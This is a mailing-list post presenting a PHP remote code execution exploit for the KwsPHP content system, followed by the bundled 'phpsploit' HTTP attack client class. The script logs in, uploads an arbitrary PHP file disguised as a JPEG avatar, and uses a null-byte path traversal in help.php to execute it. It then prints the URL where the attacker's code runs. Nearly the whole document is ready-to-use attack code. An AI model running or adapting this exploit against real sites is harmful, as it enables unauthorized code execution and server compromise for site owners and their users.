<<< Date Index >>>     <<< Thread Index >>>

KwsPHP (Upload) Remote Code Execution Exploit



<?php
/*
---KwsPHP All Version / Remote Code Execution---
Faille Discovered By TsukasaGenesis && Ajax
Sploit Coded By Ajax Site: http://www.r57shell.in
*/
if($argc<9){
        print "---KwsPHP All Version / Remote Code Execution---\n\n";
        print "usage: kwsphpsploit.php -url <url> -login <login> -pass <pass> 
-email <email> -file <file> [-id <id>]\n\n";
        print "Url      url of KwsPHP script : Ex : www.example.com/kwsphp/\n";
        print "Login    your account's login ( need to be allow to upload )\n";
        print "Pass     account's password\n";
        print "Email    account's email\n";
        print "File     PHP script upload and execute\n";
        print "Id       account'id\n\n";
        exit();
        }
function getparam($param,$opt='')
{
        global $argv;
        foreach($argv as $value => $key)
        {
                if($key == '-'.$param) return $argv[$value+1];
        }
        if($opt) exit("\n-$param parameter required");
        else return;
}
$url  = getparam("url",1);
$login = getparam("login",1);
$pass = getparam("pass",1);
$email = getparam("email",1);
$file = getparam("file",1);
$id  = getparam("id");
$source = @file_get_contents($file);
if(strlen($source)<2){ exit("$file don't exist.\n"); }

$xpl = new phpsploit();
$s = $xpl->post($url."/index.php?","sql_pseudo=$login&sql_pass=$pass");

//Cookies

if(preg_match("#Set-Cookie: PHPSESSID=([a-z0-9]+)#i",$s,$phpsessid) && 
!preg_match("#name=\"sql_pseudo\"#i",$s)){ 
        $xpl->addcookie("PHPSESSID",$phpsessid[1]);
        $xpl->addcookie("sql_pseudo",$login);
        $xpl->addcookie("sql_pass",md5($pass));
        $xpl->addcookie("auto","off");
        print "[*] PHPSESSID : $phpsessid[1]\n";
        } 
else{ exit("[*] Can't log in\n"); }

//Id
if(!isset($id)){
        preg_match("#id=([0-9]+)\" title=\"Voir son 
profil\">".$login."<\/a>#i",$s,$id_member);
        $id = $id_member[1];
        }
print "[*] Id : $id\n";

//Upload
$formdata =  array(frmdt_url => $url.'/index.php?mod=espace_membre&ac=profil',
                'action' => 'modifier',
                'ok' => '1',
                'id' => $id,
                'pseudo' => $login,
                'sql_newNom' => $login,
                'sql_newMail' => $email,
                'MAX_FILE_SIZE' => '2097152',
                'valider' => ' Modifier mon profil',
                'userfile[]' => array(
                        frmdt_type => 'image/jpeg',
                        frmdt_filename => 'test.jpg',
                        frmdt_content => $source));
$xpl->formdata($formdata);
print "[*] Upload finish.\n";
$url = 
$url."/eskuel/help.php?action=../../../images/avatars/upload/".$id.".jpg%00";
print "[*] Exploit Sucess !\n";
print "[*] The code can be run here : \nhttp://"; . $url . "\n";


/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
 * GNU General Public License for more details. 
 * 
 * You should have received a copy of the GNU General Public License 
 * along with this program; if not, write to the Free Software 
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
 * 
 * TITLE:          PhpSploit Class
 * REQUIREMENTS:   PHP 4 / PHP 5
 * VERSION:        2.0
 * LICENSE:        GNU General Public License
 * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
 * FILENAME:       phpsploitclass.php
 *
 * CONTACT:        gmdarkfig@xxxxxxxxx (french / english)
 * GREETZ:         Sparah, Ddx39
 *
 * DESCRIPTION:
 * The phpsploit is a class implementing a web user agent.
 * You can add cookies, headers, use a proxy server with (or without) a
 * basic authentification. It supports the GET and the POST method. It can
 * also be used like a browser with the cookiejar() function (which allow
 * a server to add several cookies for the next requests) and the
 * allowredirection() function (which allow the script to follow all
 * redirections sent by the server). It can return the content (or the
 * headers) of the request. Others useful functions can be used for debugging.
 * A manual is actually in development but to know how to use it, you can
 * read the comments.
 *
 * CHANGELOG:
 *
 * [2007-06-10] (2.0)
 *  * Code: Code optimization
 *  * New: Compatible with PHP 4 by default
 *
 * [2007-01-24] (1.2)
 *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
 *  * New: multipart/form-data enctype is now supported 
 *
 * [2006-12-31] (1.1)
 *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) 
bug)
 *  * New: You can now call the getheader() / getcontent() function without 
parameters
 *
 * [2006-12-30] (1.0)
 *  * First version
 * 
 */

class phpsploit
{
        var $proxyhost;
        var $proxyport;
        var $host;
        var $path;
        var $port;
        var $method;
        var $url;
        var $packet;
        var $proxyuser;
        var $proxypass;
        var $header;
        var $cookie;
        var $data;
        var $boundary;
        var $allowredirection;
        var $last_redirection;
        var $cookiejar;
        var $recv;
        var $cookie_str;
        var $header_str;
        var $server_content;
        var $server_header;
        

        /**
         * This function is called by the
         * get()/post()/formdata() functions.
         * You don't have to call it, this is
         * the main function.
         *
         * @access private
         * @return string $this->recv ServerResponse
         * 
         */
        function sock()
        {
                if(!empty($this->proxyhost) && !empty($this->proxyport))
                   $socket = @fsockopen($this->proxyhost,$this->proxyport);
                else
                   $socket = @fsockopen($this->host,$this->port);
                
                if(!$socket)
                   die("Error: Host seems down");
                
                if($this->method=='get')
                   $this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
                   
                elseif($this->method=='post' or $this->method=='formdata')
                   $this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
                   
                else
                   die("Error: Invalid method");
                
                if(!empty($this->proxyuser))
                   $this->packet .= 'Proxy-Authorization: Basic 
'.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
                
                if(!empty($this->header))
                   $this->packet .= $this->showheader();
                   
                if(!empty($this->cookie))
                   $this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
        
                $this->packet .= 'Host: '.$this->host."\r\n";
                $this->packet .= "Connection: Close\r\n";
                
                if($this->method=='post')
                {
                        $this->packet .= "Content-Type: 
application/x-www-form-urlencoded\r\n";
                        $this->packet .= 'Content-Length: 
'.strlen($this->data)."\r\n\r\n";
                        $this->packet .= $this->data."\r\n";
                }
                elseif($this->method=='formdata')
                {
                        $this->packet .= 'Content-Type: multipart/form-data; 
boundary='.str_repeat('-',27).$this->boundary."\r\n";
                        $this->packet .= 'Content-Length: 
'.strlen($this->data)."\r\n\r\n";
                        $this->packet .= $this->data;
                }

                $this->packet .= "\r\n";
                $this->recv = '';

                fputs($socket,$this->packet);

                while(!feof($socket))
                   $this->recv .= fgets($socket);

                fclose($socket);

                if($this->cookiejar)
                   $this->getcookie();

                if($this->allowredirection)
                   return $this->getredirection();
                else
                   return $this->recv;
        }
        

        /**
         * This function allows you to add several
         * cookies in the request.
         * 
         * @access  public
         * @param   string cookn CookieName
         * @param   string cookv CookieValue
         * @example $this->addcookie('name','value')
         * 
         */
        function addcookie($cookn,$cookv)
        {
                if(!isset($this->cookie))
                   $this->cookie = array();

                $this->cookie[$cookn] = $cookv;
        }


        /**
         * This function allows you to add several
         * headers in the request.
         *
         * @access  public
         * @param   string headern HeaderName
         * @param   string headervalue Headervalue
         * @example $this->addheader('Client-IP', '128.5.2.3')
         * 
         */
        function addheader($headern,$headervalue)
        {
                if(!isset($this->header))
                   $this->header = array();
                   
                $this->header[$headern] = $headervalue;
        }


        /**
         * This function allows you to use an
         * http proxy server. Several methods
         * are supported.
         * 
         * @access  public
         * @param   string proxy ProxyHost
         * @param   integer proxyp ProxyPort
         * @example $this->proxy('localhost',8118)
         * @example $this->proxy('localhost:8118')
         * 
         */
        function proxy($proxy,$proxyp='')
        {
                if(empty($proxyp))
                {
                        $proxarr = explode(':',$proxy);
                        $this->proxyhost = $proxarr[0];
                        $this->proxyport = (int)$proxarr[1];
                }
                else 
                {
                        $this->proxyhost = $proxy;
                        $this->proxyport = (int)$proxyp;
                }

                if($this->proxyport > 65535)
                   die("Error: Invalid port number");
        }
        

        /**
         * This function allows you to use an
         * http proxy server which requires a
         * basic authentification. Several
         * methods are supported:
         *
         * @access  public
         * @param   string proxyauth ProxyUser
         * @param   string proxypass ProxyPass
         * @example $this->proxyauth('user','pwd')
         * @example $this->proxyauth('user:pwd');
         * 
         */
        function proxyauth($proxyauth,$proxypass='')
        {
                if(empty($proxypass))
                {
                        $posvirg = strpos($proxyauth,':');
                        $this->proxyuser = substr($proxyauth,0,$posvirg);
                        $this->proxypass = substr($proxyauth,$posvirg+1);
                }
                else
                {
                        $this->proxyuser = $proxyauth;
                        $this->proxypass = $proxypass;
                }
        }


        /**
         * This function allows you to set
         * the 'User-Agent' header.
         * 
         * @access  public
         * @param   string useragent Agent
         * @example $this->agent('Firefox')
         * 
         */
        function agent($useragent)
        {
                $this->addheader('User-Agent',$useragent);
        }

        
        /**
         * This function returns the headers
         * which will be in the next request.
         * 
         * @access  public
         * @return  string $this->header_str Headers
         * @example $this->showheader()
         * 
         */
        function showheader()
        {
                $this->header_str = '';
                
                if(!isset($this->header))
                   return;
                   
                foreach($this->header as $name => $value)
                   $this->header_str .= $name.': '.$value."\r\n";
                   
                return $this->header_str;
        }

        
        /**
         * This function returns the cookies
         * which will be in the next request.
         * 
         * @access  public
         * @return  string $this->cookie_str Cookies
         * @example $this->showcookie()
         * 
         */
        function showcookie()
        {
                $this->cookie_str = '';
                
                if(!isset($this->cookie))
                   return;
                
                foreach($this->cookie as $name => $value)
                   $this->cookie_str .= $name.'='.$value.'; ';

                return $this->cookie_str;
        }


        /**
         * This function returns the last
         * formed http request.
         * 
         * @access  public
         * @return  string $this->packet HttpPacket
         * @example $this->showlastrequest()
         * 
         */
        function showlastrequest()
        {
                if(!isset($this->packet))
                   return;
                else
                   return $this->packet;
        }


        /**
         * This function sends the formed
         * http packet with the GET method.
         * 
         * @access  public
         * @param   string url Url
         * @return  string $this->sock()
         * @example $this->get('localhost/index.php?var=x')
         * @example $this->get('http://localhost:88/tst.php')
         * 
         */
        function get($url)
        {
                $this->target($url);
                $this->method = 'get';
                return $this->sock();
        }

        
        /**
         * This function sends the formed
         * http packet with the POST method.
         *
         * @access  public
         * @param   string url  Url
         * @param   string data PostData
         * @return  string $this->sock()
         * @example $this->post('http://localhost/','helo=x')
         * 
         */     
        function post($url,$data)
        {
                $this->target($url);
                $this->method = 'post';
                $this->data = $data;
                return $this->sock();
        }
        

        /**
         * This function sends the formed http
         * packet with the POST method using
         * the multipart/form-data enctype.
         * 
         * @access  public
         * @param   array array FormDataArray
         * @return  string $this->sock()
         * @example $formdata = array(
         *                      frmdt_url => 'http://localhost/upload.php',
         *                      frmdt_boundary => '123456', # Optional
         *                      'var' => 'example',
         *                      'file' => array(
         *                                frmdt_type => 'image/gif',  # Optional
         *                                frmdt_transfert => 'binary' # Optional
         *                                frmdt_filename => 'hello.php,
         *                                frmdt_content => '<?php echo 1; ?>'));
         *          $this->formdata($formdata);
         * 
         */
        function formdata($array)
        {
                $this->target($array[frmdt_url]);
                $this->method = 'formdata';
                $this->data = '';
                
                if(!isset($array[frmdt_boundary]))
                   $this->boundary = 'phpsploit';
                else
                   $this->boundary = $array[frmdt_boundary];

                foreach($array as $key => $value)
                {
                        if(!preg_match('#^frmdt_(boundary|url)#',$key))
                        {
                                $this->data .= 
str_repeat('-',29).$this->boundary."\r\n";
                                $this->data .= 'Content-Disposition: form-data; 
name="'.$key.'";';
                                
                                if(!is_array($value))
                                {
                                        $this->data .= "\r\n\r\n".$value."\r\n";
                                }
                                else
                                {
                                        $this->data .= ' 
filename="'.$array[$key][frmdt_filename]."\";\r\n";

                                        if(isset($array[$key][frmdt_type]))
                                           $this->data .= 'Content-Type: 
'.$array[$key][frmdt_type]."\r\n";

                                        if(isset($array[$key][frmdt_transfert]))
                                           $this->data .= 
'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";

                                        $this->data .= 
"\r\n".$array[$key][frmdt_content]."\r\n";
                                }
                        }
                }

                $this->data .= str_repeat('-',29).$this->boundary."--\r\n";
                return $this->sock();
        }

        
        /**
         * This function returns the content
         * of the server response, without
         * the headers.
         * 
         * @access  public
         * @param   string code ServerResponse
         * @return  string $this->server_content
         * @example $this->getcontent()
         * @example $this->getcontent($this->get('http://localhost/'))
         * 
         */
        function getcontent($code='')
        {
                if(empty($code))
                   $code = $this->recv;

                $code = explode("\r\n\r\n",$code);
                $this->server_content = '';
                
                for($i=1;$i<count($code);$i++)
                   $this->server_content .= $code[$i];

                return $this->server_content;
        }

        
        /**
         * This function returns the headers
         * of the server response, without
         * the content.
         * 
         * @access  public
         * @param   string code ServerResponse
         * @return  string $this->server_header
         * @example $this->getcontent()
         * @example $this->getcontent($this->post('http://localhost/','1=2'))
         * 
         */
        function getheader($code='')
        {
                if(empty($code))
                   $code = $this->recv;

                $code = explode("\r\n\r\n",$code);
                $this->server_header = $code[0];
                
                return $this->server_header;
        }

        
        /**
         * This function is called by the
         * cookiejar() function. It adds the
         * value of the "Set-Cookie" header
         * in the "Cookie" header for the
         * next request. You don't have to
         * call it.
         * 
         * @access private
         * @param  string code ServerResponse
         * 
         */
        function getcookie()
        {
                foreach(explode("\r\n",$this->getheader()) as $header)
                {
                        if(preg_match('/set-cookie/i',$header))
                        {
                                $fequal = strpos($header,'=');
                                $fvirgu = strpos($header,';');
                                
                                // 12=strlen('set-cookie: ')
                                $cname  = substr($header,12,$fequal-12);
                                $cvalu  = 
substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
                                
                                $this->cookie[trim($cname)] = trim($cvalu);
                        }
                }
        }


        /**
         * This function is called by the
         * get()/post() functions. You
         * don't have to call it.
         *
         * @access  private
         * @param   string urltarg Url
         * @example $this->target('http://localhost/')
         * 
         */
        function target($urltarg)
        {
                if(!ereg('^http://',$urltarg))
                   $urltarg = 'http://'.$urltarg;
                   
                $urlarr     = parse_url($urltarg);
                $this->url  = 'http://'.$urlarr['host'].$urlarr['path'];
                
                if(isset($urlarr['query']))
                   $this->url .= '?'.$urlarr['query'];
                
                $this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
                $this->host = $urlarr['host'];
                
                if($this->port != '80')
                   $this->host .= ':'.$this->port;

                if(!isset($urlarr['path']) or empty($urlarr['path']))
                   die("Error: No path precised");

                $this->path = 
substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);

                if($this->port > 65535)
                   die("Error: Invalid port number");
        }
        
        
        /**
         * If you call this function,
         * the script will extract all
         * 'Set-Cookie' headers values
         * and it will automatically add
         * them into the 'Cookie' header
         * for all next requests.
         *
         * @access  public
         * @param   integer code 1(enabled) 0(disabled)
         * @example $this->cookiejar(0)
         * @example $this->cookiejar(1)
         * 
         */
        function cookiejar($code)
        {
                if($code=='0')
                   $this->cookiejar=FALSE;

                elseif($code=='1')
                   $this->cookiejar=TRUE;
        }


        /**
         * If you call this function,
         * the script will follow all
         * redirections sent by the server.
         * 
         * @access  public
         * @param   integer code 1(enabled) 0(disabled)
         * @example $this->allowredirection(0)
         * @example $this->allowredirection(1)
         * 
         */
        function allowredirection($code)
        {
                if($code=='0')
                   $this->allowredirection=FALSE;
                   
                elseif($code=='1')
                   $this->allowredirection=TRUE;
        }

        
        /**
         * This function is called if
         * allowredirection() is enabled.
         * You don't have to call it.
         *
         * @access private
         * @return string 
$this->get('http://'.$this->host.$this->path.$this->last_redirection)
         * @return string $this->get($this->last_redirection)
         * @return string $this->recv;
         * 
         */
        function getredirection()
        {
                if(preg_match('/(location|content-location|uri): 
(.*)/i',$this->getheader(),$codearr))
                {
                        $this->last_redirection = trim($codearr[2]);
                        
                        if(!ereg('://',$this->last_redirection))
                           return 
$this->get('http://'.$this->host.$this->path.$this->last_redirection);

                        else
                           return $this->get($this->last_redirection);
                }
                else
                   return $this->recv;
        }


        /**
         * This function allows you
         * to reset some parameters.
         * 
         * @access  public
         * @param   string func Param
         * @example $this->reset('header')
         * @example $this->reset('cookie')
         * @example $this->reset()
         * 
         */
        function reset($func='')
        {
                switch($func)
                {
                        case 'header':
                        $this->header = array();
                        break;
                                
                        case 'cookie':
                        $this->cookie = array();
                        break;
                                
                        default:
                        $this->cookiejar = '';
                        $this->header = array();
                        $this->cookie = array();
                        $this->allowredirection = '';
                        break;
                }
        }
}
?>